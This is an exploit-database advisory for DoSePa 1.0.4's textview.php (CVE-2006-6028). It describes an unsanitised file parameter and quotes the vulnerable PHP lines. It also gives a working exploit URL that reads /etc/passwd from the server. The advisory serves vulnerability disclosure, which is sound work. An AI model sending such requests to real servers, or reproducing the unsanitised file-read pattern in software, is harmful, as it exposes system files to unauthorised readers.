DoSePa 1.0.4 - 'textview.php' Information Disclosure

Author: Craig Heffner
type: webapps
platform: php
port: 
date_added: 2006-11-16 
date_updated: 2016-11-08 
verified: 1 
codes: OSVDB-30499;CVE-2006-6028 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdosepa.zip

#######################################################################################
# Target:
#
#       DoSePa 1.0.4 (textview.php)
#       http://sourceforge.net/project/showfiles.php?group_id=91686
#
# Vulnerability:
#
#       Information disclosure.
#
# Description:
#
#       The textview.php page in DoSePa does not properly sanitize the $_GET['file']
#       value; this allows an attacker to view any file to which the server has
#       read rights.
#
# Vulnerable Code (truncated):
#
#       $file=$_GET['file'];
#       file_get_contents($file);
#
# Exploit:
#
#       http://dosepa.somesite.com/textview.php?file=/etc/passwd
#
# Discovery:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
#######################################################################################

# milw0rm.com [2006-11-17]